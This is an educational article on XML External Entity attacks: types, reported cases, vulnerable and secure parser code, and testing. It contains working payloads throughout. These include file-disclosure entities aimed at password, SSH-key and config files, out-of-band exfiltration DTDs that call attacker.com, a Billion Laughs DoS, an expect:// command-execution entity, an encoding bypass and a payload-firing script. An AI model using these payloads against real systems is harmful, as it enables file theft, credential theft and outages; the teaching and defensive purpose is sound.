# XML External Entity (XXE) Attacks

CRITICAL SEVERITY FILE DISCLOSURE XML INJECTION

Imagine filling out a form that asks for your name, but instead of writing "John," you write "Please read the contents of the safe behind you and write it here" - and the clerk actually does it. That's XML External Entity (XXE) in a nutshell.

XXE attacks exploit how servers parse XML files. When you upload a specially crafted XML file, the parser follows the instructions embedded in it, like reading sensitive files or making network requests you shouldn't be able to make.

Simple Example: You upload an innocent-looking XML file to a website. Hidden in that file is an instruction that says "Read /etc/passwd file." The server obediently reads the file and includes its contents in the response - giving you access to system files you should never see.

Critical for Legacy Systems

While many newer applications use JSON instead of XML, millions of legacy systems still process XML - SOAP APIs, document processors, configuration parsers, and more. XXE remains a critical vulnerability that can lead to file disclosure, server-side request forgery (SSRF), and denial of service.

# What is XXE? (In Simple Terms)

XML (eXtensible Markup Language) is a way to structure data, kind of like HTML. It looks like this:

<person>
    <name>John</name>
    <age>30</age>
</person>

Entities in XML are like variables or shortcuts. You can define them like this:

<!DOCTYPE message [
  <!ENTITY company "Acme Corp">
]>
<message>Welcome to &company;</message>

When processed, &company; gets replaced with "Acme Corp".
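To see the substitution happen, here is a minimal sketch using Python's standard-library `xml.etree.ElementTree`. The entity is declared inside a DOCTYPE, which is where a parser expects to find it; the variable names are illustrative only.

```python
import xml.etree.ElementTree as ET

# The entity declaration sits inside a DOCTYPE so the parser accepts it.
DOCUMENT = """<!DOCTYPE message [
  <!ENTITY company "Acme Corp">
]>
<message>Welcome to &company;</message>"""

root = ET.fromstring(DOCUMENT)
expanded_text = root.text  # the parser has already replaced &company;
print(expanded_text)
```

The application code never sees `&company;`. It only sees the expanded text, which is why entity handling has to be controlled in the parser configuration rather than after parsing.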

External Entities can reference files or URLs:

<!DOCTYPE data [
  <!ENTITY external SYSTEM "file:///etc/passwd">
]>
<data>&external;</data>

The Vulnerability

If the XML parser is configured to process external entities (as many are by default, especially in older library versions), it will read the referenced file and substitute its contents for the entity reference. This is what hackers exploit.

# Real-World Analogies

You're filling out a form at a government office. In the "Name" field, instead of writing your name, you write: "Copy the contents of File #1234 into this field." If the clerk follows instructions blindly, they'll read a confidential file and write it on your form for you to see.

You hand someone a document to copy. Hidden in your document is an instruction: "Go to the filing cabinet, retrieve Document X, and make a copy for this person." If they follow embedded instructions without thinking, they'll give you documents you shouldn't have access to.

Mad Libs asks you to fill in blanks: "The ___ ran to the ___." Normally you write words. But what if you write "contents of my diary" in the blank? If the Mad Libs book could actually fetch and insert your diary contents, that's XXE - using a placeholder to inject external content.

# How XXE Works (The Step-by-Step Story)

Let's see how a typical XXE attack unfolds:

Scenario: Website with XML File Upload

<?xml version="1.0"?>
<!-- User uploads normal XML -->
<order>
    <item>Laptop</item>
    <quantity>1</quantity>
</order>

Server processes it normally and displays: "Order received: 1 Laptop"

<?xml version="1.0"?>
<!-- Hacker uploads this -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order>
    <item>&xxe;</item>
    <quantity>1</quantity>
</order>

1. Parser sees <!ENTITY xxe SYSTEM "file:///etc/passwd">
2. Parser defines entity "xxe" that references /etc/passwd
3. Parser sees &xxe; in the XML
4. Parser reads /etc/passwd file
5. Parser replaces &xxe; with file contents

Order received: 1 root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

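The hacker just read the server's user account file! On modern systems /etc/passwd lists accounts rather than password hashes, but the same technique works on any file the server process can read.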
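The parser's behaviour in this scenario can be modelled in a few lines of Python. This is a toy sketch, not a real XML parser: `FAKE_FILES`, `ENTITY_DECL`, and `naive_expand` are hypothetical names, and the "filesystem" is an in-memory dictionary so nothing is actually read from disk.

```python
import re

# Hypothetical in-memory "filesystem" so the sketch never touches real files.
FAKE_FILES = {"/etc/passwd": "root:x:0:0:root:/root:/bin/bash"}

# Matches declarations such as <!ENTITY xxe SYSTEM "file:///etc/passwd">
ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+SYSTEM\s+"file://([^"]+)"\s*>')


def naive_expand(xml_text):
    """Toy model of a vulnerable parser: define entities, then substitute them."""
    entities = {}
    for name, path in ENTITY_DECL.findall(xml_text):
        # Define the entity and "read" the file it points at.
        entities[name] = FAKE_FILES.get(path, "")
    # Replace every &name; reference in the document body with the contents.
    body = xml_text.split("]>", 1)[-1]
    return re.sub(r"&(\w+);", lambda m: entities.get(m.group(1), m.group(0)), body)


PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order>
    <item>&xxe;</item>
    <quantity>1</quantity>
</order>"""

expanded = naive_expand(PAYLOAD)
print(expanded)
```

The application then treats the expanded `<item>` value as ordinary order data, which is how the file contents end up in the "Order received" message.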

# Types of XXE Attacks

# 1. Classic XXE (File Disclosure)

FILE ACCESS DATA THEFT

What it is: Reading files from the server's filesystem.

Attack Example:

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<userInfo>
  <firstName>&file;</firstName>
</userInfo>

Files Hackers Target:

[Linux Systems]
<!ENTITY file SYSTEM "file:///etc/passwd">       <!-- User accounts -->
<!ENTITY file SYSTEM "file:///etc/shadow">       <!-- Password hashes -->
<!ENTITY file SYSTEM "file:///etc/hosts">        <!-- Network configuration -->
<!ENTITY file SYSTEM "file:///proc/self/environ"> <!-- Environment variables -->
<!ENTITY file SYSTEM "file:///var/log/apache2/access.log"> <!-- Logs -->
<!ENTITY file SYSTEM "file:///root/.ssh/id_rsa"> <!-- SSH keys -->

[Windows Systems]
<!ENTITY file SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
<!ENTITY file SYSTEM "file:///C:/Users/Administrator/.ssh/id_rsa">
<!ENTITY file SYSTEM "file:///C:/inetpub/wwwroot/web.config">

[Application Files]
<!ENTITY file SYSTEM "file:///var/www/html/config.php">  <!-- Database passwords -->
<!ENTITY file SYSTEM "file:///app/secrets.json">         <!-- API keys -->
<!ENTITY file SYSTEM "file:///.env">                     <!-- Environment config -->

Vulnerable Code:

[Python - Vulnerable]
from lxml import etree

xml_data = request.files['upload'].read()

# In lxml before 5.0, resolve_entities defaults to True, so external file entities are expanded!
parser = etree.XMLParser()
tree = etree.fromstring(xml_data, parser)

# Attacker can read any file the server can access

[Java - Vulnerable]
// Java - VULNERABLE
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// External entities enabled by default!
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(new StringReader(xmlData)));

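[PHP - Vulnerable]
// PHP - VULNERABLE
// libxml_disable_entity_loader() is deprecated since PHP 8.0 but still appears in older code
libxml_disable_entity_loader(false);  // DANGEROUS!
// LIBXML_NOENT turns entity substitution on, including external entities
$xml = simplexml_load_string($xmlData, 'SimpleXMLElement', LIBXML_NOENT);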

# 2. Blind XXE (No Direct Output)

STEALTHY OUT-OF-BAND

What it is: The application processes XML but doesn't return the parsed data to you. You need to exfiltrate data out-of-band.

Attack Method - Out-of-Band Exfiltration:

Create file at http://attacker.com/evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/log?data=%file;'>">
%eval;
%exfiltrate;

Then upload this XML to the target:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<data>test</data>

What happens:

1. Server parses your XML
2. Server fetches evil.dtd from your server
3. evil.dtd reads /etc/passwd
4. evil.dtd makes HTTP request to attacker.com with file contents in URL

You receive the data in your server logs:

GET /log?data=root:x:0:0:root:/root:/bin/bash... HTTP/1.1
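On the receiving side, the leaked value is simply the `data` query parameter of the logged request. A minimal sketch of pulling it out with Python's standard library follows; `extract_exfiltrated` is a hypothetical helper, and the sample log line is a single-line illustration rather than real output.

```python
from urllib.parse import parse_qs, urlsplit


def extract_exfiltrated(request_line):
    """Pull the `data` query parameter out of a logged HTTP request line."""
    _method, target, _version = request_line.split(" ", 2)
    query = urlsplit(target).query
    values = parse_qs(query).get("data", [])
    return values[0] if values else None


# Illustrative log entry in the same shape as the one shown above.
logged = "GET /log?data=root:x:0:0:root:/root:/bin/bash HTTP/1.1"
leaked = extract_exfiltrated(logged)
print(leaked)
```

For defenders, the same shape is worth alerting on: an outbound request from an XML-processing host whose query string carries file-like content.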

# 3. XXE to SSRF

NETWORK ACCESS INTERNAL SYSTEMS

What it is: Using XXE to make the server send requests to internal systems.

Attack (an internal admin endpoint, then the AWS instance metadata service):

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://localhost:8080/admin">
]>
<data>&xxe;</data>

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&xxe;</data>

SSRF Impact

The impact matches that of SSRF: the attacker can access internal services, steal cloud credentials, and scan internal networks.
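One way to reason about these payloads is to classify the system identifier an entity points at. The sketch below uses Python's `ipaddress` and `urllib.parse` modules; `targets_internal_host` is a hypothetical helper, it does not resolve DNS names, and it is meant as an illustration rather than a complete SSRF defense.

```python
import ipaddress
from urllib.parse import urlsplit


def targets_internal_host(system_id):
    """Return True when a URL points at loopback, private, or link-local space."""
    host = urlsplit(system_id).hostname
    if host is None:
        return False  # e.g. file:/// URLs carry no host at all
    if host == "localhost":
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name; resolving it is out of scope for this sketch
    return address.is_loopback or address.is_private or address.is_link_local


for candidate in (
    "http://localhost:8080/admin",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://example.com/",
):
    print(candidate, targets_internal_host(candidate))
```

Because a DNS name can resolve to an internal address, a check like this is only a supplement. Disabling external entities in the parser remains the reliable fix.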

# 4. Billion Laughs (XXE DoS)

DENIAL OF SERVICE RESOURCE EXHAUSTION

What it is: Denial of Service through exponential entity expansion.

Attack:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

What Happens:

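lol9 expands to 10 lol8's
Each lol8 expands to 10 lol7's
This continues down to lol2, which expands to 10 "lol" strings
Final expansion: 10^8 (100 million) "lol" strings, roughly 300 MB of text from a payload under 1 KB
Server can run out of memory and crash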

Why "Billion Laughs"

The classic version of this payload has one more level of nesting, so the word "lol" is repeated a billion times, which would be "laughing" a billion times.
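The growth is easy to check with arithmetic. The payload above defines lol2 through lol9, which is eight levels of tenfold expansion; the constant names in this sketch are illustrative.

```python
FANOUT = 10   # each entity references the previous one ten times
LEVELS = 8    # lol2 through lol9 in the payload above
BASE = "lol"

copies = FANOUT ** LEVELS
expanded_bytes = copies * len(BASE)
print(f"{copies:,} copies, about {expanded_bytes / 1e6:.0f} MB")
```

Adding a ninth level, as the classic payload does, multiplies both numbers by ten: a billion copies and about 3 GB of text.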

# 5. XXE in Different File Formats

HIDDEN XXE

XXE isn't just in .xml files. Many file formats use XML internally:

[DOCX]
1. Create malicious XXE in word/document.xml
2. Zip it as .docx
3. Upload to document processor
4. XXE triggers when the server parses the document

[XLSX]
1. Malicious XML in xl/worksheets/sheet1.xml
2. Same attack as DOCX

[SVG]
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="500" height="500" xmlns="http://www.w3.org/2000/svg">
  <text x="0" y="16">&xxe;</text>
</svg>

[SOAP]
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <getUserInfo>
      <userId>&xxe;</userId>
    </getUserInfo>
  </soap:Body>
</soap:Envelope>
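Since office documents are zip archives of XML parts, an upload can be inspected before it reaches a document processor. The following is a rough sketch using Python's `zipfile` module. `parts_with_doctype` and `build_sample` are hypothetical helpers, and the byte-level check is an assumption that only holds for parts stored in an ASCII-compatible encoding.

```python
import io
import zipfile


def parts_with_doctype(archive_bytes):
    """Return names of XML parts inside a zip-based document that declare a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for name in archive.namelist():
            if name.endswith((".xml", ".rels")):
                # Byte-level check only; it misses UTF-16 or otherwise re-encoded parts.
                if b"<!DOCTYPE" in archive.read(name):
                    flagged.append(name)
    return flagged


def build_sample(document_xml):
    """Build a tiny in-memory archive standing in for an uploaded .docx."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("word/document.xml", document_xml)
    return buffer.getvalue()


malicious = build_sample('<!DOCTYPE d [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><d>&xxe;</d>')
clean = build_sample("<d>hello</d>")
print(parts_with_doctype(malicious), parts_with_doctype(clean))
```

Legitimate office documents do not normally need a DOCTYPE in their parts, so a hit here is a reasonable signal to reject the upload.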

# Real-World Attack Scenarios

# Scenario 1: Facebook XXE Vulnerability (2014)

$30K BOUNTY RESPONSIBLE DISCLOSURE

The Setup:

Facebook allowed uploading office documents
Documents were processed server-side for preview
DOCX files contain XML

The Attack:

Researcher created DOCX with XXE payload

XXE payload read internal files

Could access:

Internal network configurations
Source code
Configuration files

Impact:

Reported through bug bounty
Facebook paid $30,000 reward
Vulnerability patched quickly

# Scenario 2: Google's XXE in XML Editor

CLIENT-SIDE XXE

The Attack:

Google Toolbar used XML for configuration
XML editor didn't disable external entities

Attack Payload:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///c:/boot.ini">
]>
<config>&xxe;</config>

Result:

Could read local files from user's computer
Patched after responsible disclosure

# Scenario 3: IRS E-Filing XXE (2018)

GOVERNMENT SYSTEM TAX DATA

The Setup:

IRS tax filing system accepted XML
Used for business tax returns
Inadequate XXE protection

Potential Attack:

<!-- Tax return XML -->
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<TaxReturn>
  <BusinessName>&xxe;</BusinessName>
</TaxReturn>

Impact:

Could have accessed sensitive tax data
Found by security researchers
Government patched before exploitation

# Scenario 4: WordPress Plugin XXE

MASS EXPLOITATION WORDPRESS

The Vulnerability:

Popular WordPress plugin processed XML feeds
RSS/Atom feed parser had XXE vulnerability

Attack:

<?xml version="1.0"?>
<!-- Malicious RSS feed -->
<!DOCTYPE rss [
  <!ENTITY xxe SYSTEM "file:///var/www/html/wp-config.php">
]>
<rss version="2.0">
  <channel>
    <title>&xxe;</title>
  </channel>
</rss>

Result:

Exposed WordPress database credentials
Affected thousands of websites
Emergency patch released

# Advanced XXE Techniques

# 1. PHP Expect Wrapper (Remote Code Execution)

RCE

If PHP's expect module is loaded:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "expect://id">
]>
<data>&xxe;</data>

Remote Code Execution

Executes id command on server

# 2. Parameter Entities for Blind XXE

ADVANCED

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
  %all;
]>
<foo>&send;</foo>

Contents of http://attacker.com/evil.dtd:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">

# 3. UTF-7 Encoding Bypass

FILTER EVASION

Some filters check for <!ENTITY but miss encoded versions:

<?xml version="1.0" encoding="UTF-7"?>
+ADw-+ACE-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI +AD4
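A short Python sketch shows why a byte-level filter misses this. It uses the same declaration as above with every UTF-7 shift sequence explicitly closed by `-`; `naive_filter_blocks` is a hypothetical stand-in for the kind of filter being evaded.

```python
RAW = b'+ADw-+ACE-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI- +AD4-'


def naive_filter_blocks(data):
    """A byte-level filter that only looks for the literal <!ENTITY marker."""
    return b"<!ENTITY" in data


# What a parser that honours the UTF-7 declaration would actually see.
decoded = RAW.decode("utf-7")

print(naive_filter_blocks(RAW))
print(naive_filter_blocks(decoded.encode("utf-8")))
print(decoded)
```

The filter inspects the encoded bytes while the parser acts on the decoded text. Any filter therefore has to decode the document the same way the parser will, or the parser should be restricted to a known set of encodings.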

# 4. XInclude Attacks

ALTERNATIVE METHOD

When you can't control DTD but can control XML content:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>
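Because XInclude needs no DTD, a check for DOCTYPE alone will not catch it. As a hedged sketch, the snippet below lists `xi:include` targets with Python's standard-library `xml.etree.ElementTree`, which parses the element without resolving it; `xinclude_targets` is a hypothetical helper.

```python
import xml.etree.ElementTree as ET

XINCLUDE_TAG = "{http://www.w3.org/2001/XInclude}include"


def xinclude_targets(xml_text):
    """List the href of every xi:include element without resolving any of them."""
    root = ET.fromstring(xml_text)
    return [element.get("href") for element in root.iter(XINCLUDE_TAG)]


SAMPLE = """<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>"""

print(xinclude_targets(SAMPLE))
```

Matching on the namespace URI rather than the `xi:` prefix matters, since an attacker can bind the XInclude namespace to any prefix.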

# Prevention and Mitigation

# 1. Disable External Entities (Primary Defense)

PRIMARY DEFENSE

[Python (lxml) - Secure]
from lxml import etree

# SECURE: Disable external entities
parser = etree.XMLParser(
    resolve_entities=False,  # Don't resolve entities
    no_network=True,         # No network access
    load_dtd=False           # Don't load DTD
)

xml_data = request.files['upload'].read()
tree = etree.fromstring(xml_data, parser)

[Java - Secure]
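import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;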

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

// SECURE: Disable all the things
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);

DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(new StringReader(xmlData)));

[PHP - Secure]
<?php
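// SECURE: libxml 2.9.0+ does not load external entities by default.
// libxml_disable_entity_loader() is deprecated since PHP 8.0, so only call it on older versions.
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}

// Even better: never pass LIBXML_NOENT, and block network access with LIBXML_NONET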
$xml = simplexml_load_string(
    $xmlData,
    'SimpleXMLElement',
    LIBXML_NOCDATA | LIBXML_NONET
);
?>

[Node.js - Secure]
const libxmljs = require('libxmljs');

// SECURE: Disable external entities
const xml = libxmljs.parseXml(xmlData, {
    noent: false,    // Don't substitute entities
    nonet: true,     // No network access
    dtdload: false,  // Don't load DTD
    dtdvalid: false  // Don't validate against DTD
});

[.NET - Secure]
using System.Xml;

XmlReaderSettings settings = new XmlReaderSettings();

// SECURE: Disable DTD processing
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;

using (XmlReader reader = XmlReader.Create(stream, settings))
{
    XmlDocument doc = new XmlDocument();
    doc.Load(reader);
}
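The "disallow DOCTYPE" idea behind several of these settings can also be sketched with Python's built-in expat bindings, using nothing outside the standard library. `DoctypeForbidden`, `reject_doctype`, and `check_no_doctype` are hypothetical names; this is an illustration of the approach, not a replacement for configuring the real parser.

```python
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when a document carries a DOCTYPE declaration."""


def reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this as soon as it meets <!DOCTYPE ...>, before any entity is used.
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")


def check_no_doctype(xml_bytes):
    """Parse the input once and fail fast if it declares a DTD."""
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.Parse(xml_bytes, True)
    return True


print(check_no_doctype(b"<order><item>Laptop</item></order>"))
try:
    check_no_doctype(b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data>')
except DoctypeForbidden as error:
    print("rejected:", error)
```

Rejecting the DOCTYPE outright blocks external entities, parameter entities, and entity-expansion bombs in one step, which is why it is usually the first setting to reach for when the application does not need DTDs.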

# 2. Use Simple Data Formats

RECOMMENDED

Avoid XML When Possible (the same order as XML, then as JSON):

<order>
  <item>Laptop</item>
  <quantity>1</quantity>
</order>

{
  "order": {
    "item": "Laptop",
    "quantity": 1
  }
}

Why JSON is Better

JSON doesn't have entity expansion or DTD processing - no XXE vulnerability!
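A quick sketch with Python's standard `json` module illustrates the point: an entity-style string inside JSON is just text. The `ORDER` value is an illustrative variation of the order above.

```python
import json

# The same order, with an entity-style reference placed in the item field.
ORDER = '{"order": {"item": "&xxe;", "quantity": 1}}'

parsed = json.loads(ORDER)
item = parsed["order"]["item"]
print(item)
```

The parser returns the characters exactly as sent, so there is nothing for an attacker to make it fetch.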

# 3. Input Validation

DEFENSE IN DEPTH

import re

def validate_xml(xml_string):
    """Check for suspicious XML content"""

    dangerous_patterns = [
        r'<!ENTITY',
        r'<!DOCTYPE',
        r'SYSTEM',
        r'PUBLIC',
        r'file://',
        r'http://',
        r'https://',
        r'expect://',
        r'php://'
    ]

    for pattern in dangerous_patterns:
        if re.search(pattern, xml_string, re.IGNORECASE):
            raise ValueError(f"Suspicious XML content: {pattern}")

    return True

# Usage
xml_data = request.files['upload'].read().decode('utf-8')  # read() returns bytes; the patterns expect str
validate_xml(xml_data)  # Raises ValueError if a pattern matches

Important Note

Input validation is defense-in-depth, not primary defense. Always disable external entities!

# 4. Use Modern XML Libraries

RECOMMENDED

Recommended Libraries:

defusedxml (Python) - Secure XML library specifically for preventing attacks

import defusedxml.ElementTree as ET

# Automatically prevents XXE, billion laughs, etc.
tree = ET.parse('file.xml')

Use latest versions with secure defaults or consider using JSON instead

fast-xml-parser (Node.js) with safe defaults. Better: use JSON

# 5. Least Privilege

INFRASTRUCTURE

[Create Limited User]
# Run application with limited permissions
# Can't read /etc/shadow or other users' SSH keys if the process doesn't have permission

# Create limited user
useradd -r -s /bin/false xmlapp

# Run app as limited user
su -s /bin/sh xmlapp -c 'node server.js'

[File Permissions]
# Secret files the app does not need at runtime should not be readable by the app user
chmod 640 /app/config/database.yml
chown root:root /app/config/database.yml

# App runs as 'xmlapp' user
# Even if XXE exists, the parser can't read this file
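To audit the result, a small Python sketch can report whether a file is still readable by every local user. `is_world_readable` is a hypothetical helper, the check assumes POSIX permission bits, and the temporary file stands in for a real config file.

```python
import os
import stat
import tempfile


def is_world_readable(path):
    """True when the file's "other" read bit is set, so any local user can read it."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


with tempfile.NamedTemporaryFile() as handle:
    os.chmod(handle.name, 0o640)  # same mode as the chmod example above
    locked_down = is_world_readable(handle.name)
    os.chmod(handle.name, 0o644)  # a common default that exposes the file
    exposed = is_world_readable(handle.name)

print(locked_down, exposed)
```

Running a check like this over the application's config directory shows which files an XXE payload could still reach under the limited account.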

# Testing for XXE Vulnerabilities

# Manual Testing

TESTING GUIDE

Look for inputs that accept XML:

File uploads (.xml, .docx, .xlsx, .svg)
API endpoints accepting XML
SOAP web services
RSS/Atom feed parsers
Configuration file uploads

Upload this XML:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY test "Hello XXE">
]>
<data>&test;</data>

If the response contains "Hello XXE", entities are processed. Next, try an external entity:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<data>&xxe;</data>

Check whether the hostname appears in the response.

For blind XXE, set up a listener:

nc -lvp 9001

Upload XML:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://YOUR-IP:9001/test">
]>
<data>&xxe;</data>

If you receive a connection, blind XXE exists.

# Automated Tools

[XXEinjector]
# Test for XXE
ruby XXEinjector.rb --host=192.168.1.100 --path=/upload --file=/tmp/test.xml --oob=http --phpfilter

# Enumerate files
ruby XXEinjector.rb --host=target.com --file=request.txt --enumeration

[Burp Suite]
Capture XML request
Send to Intruder
Insert XXE payloads
Analyze responses

[Custom Test Script]
import requests

url = "http://target.com/upload"

# Test payloads
payloads = [
    # Basic entity
    '''<?xml version="1.0"?>
    <!DOCTYPE foo [<!ENTITY test "XXE_WORKS">]>
    <data>&test;</data>''',

    # File disclosure
    '''<?xml version="1.0"?>
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
    <data>&xxe;</data>''',

    # Out-of-band
    '''<?xml version="1.0"?>
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/xxe">]>
    <data>&xxe;</data>'''
]

for i, payload in enumerate(payloads):
    response = requests.post(url, data=payload, headers={'Content-Type': 'application/xml'})

    print(f"Payload {i+1}:")
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text[:200]}")
    print("-" * 50)

# Summary: What You Need to Remember

XML External Entity (XXE) exploits how XML parsers process external references. By uploading specially crafted XML, attackers can read server files, make internal network requests, or crash the server through resource exhaustion.

The Simple Version:

What it is: Tricking XML parser into reading files or making requests by embedding malicious entity references
Why it's dangerous: Can read sensitive files (passwords, keys), access internal systems (SSRF), or crash servers (DoS)
How to prevent it: Disable external entity processing in XML parsers, use JSON instead of XML

Real-World Impact:

Facebook: Internal file disclosure (2014) - $30K bug bounty
IRS: Tax system vulnerability (2018)
WordPress: Mass exploitation through plugins

Common Targets: Configuration files, password files, SSH keys, source code

# Quick Protection Checklist

For Website Owners & Developers:

DO Disable external entity processing in all XML parsers
DO Disable DTD (Document Type Definition) processing
DO Use simple data formats (JSON) instead of XML when possible
DO Use secure XML libraries (defusedxml, latest versions)
DO Run application with least privilege
DO Validate and sanitize XML input
DO Keep XML processing libraries updated

DON'T Allow external entity resolution in XML parsers
DON'T Process untrusted XML with default parser settings
DON'T Return raw XML parsing errors to users
DON'T Trust office documents (.docx, .xlsx) - they contain XML
DON'T Allow DTD declarations in user-supplied XML

For Regular Users:

TIP Be cautious uploading XML files to untrusted sites - they could test for XXE
TIP XXE mainly affects servers, not end users directly
TIP If you manage systems, audit all XML-processing code

# Additional Resources

Learn More

Layerd AI Guardian Proxy can detect XXE attack patterns in uploaded XML and block malicious entity declarations before they reach your application.

Last updated: November 2025
